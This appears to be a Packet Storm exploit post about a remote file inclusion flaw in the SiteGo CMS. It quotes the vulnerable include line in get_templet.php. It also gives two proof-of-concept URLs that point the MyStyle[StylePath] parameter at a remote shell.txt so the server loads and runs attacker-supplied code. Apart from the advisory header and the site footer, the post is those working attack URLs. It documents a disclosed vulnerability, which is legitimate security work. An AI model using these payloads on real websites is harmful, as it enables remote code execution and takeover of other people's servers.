SiteGo suffers from a remote file inclusion vulnerability.
c797879792ae8c7301e769c55cd13c98f92f854719dec1a9a9bece53c0598d6c############################################
### Exploit Title: SiteGo Remote File Inclusion Vulnerability
### Date: 10/09/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows
############################################
# File affect in two styles ( get_templet.php ) on line 120:
include "$MyStyle[StylePath]/extra/css_menu.php";
# Examples :
http://127.0.0.1/site-go/style/green/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?
http://127.0.0.1/site-go/style/blue/get_templet.php?MyStyle[StylePath]=http://127.0.0.1/shell.txt?
############################################
# Greetz to my friendz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed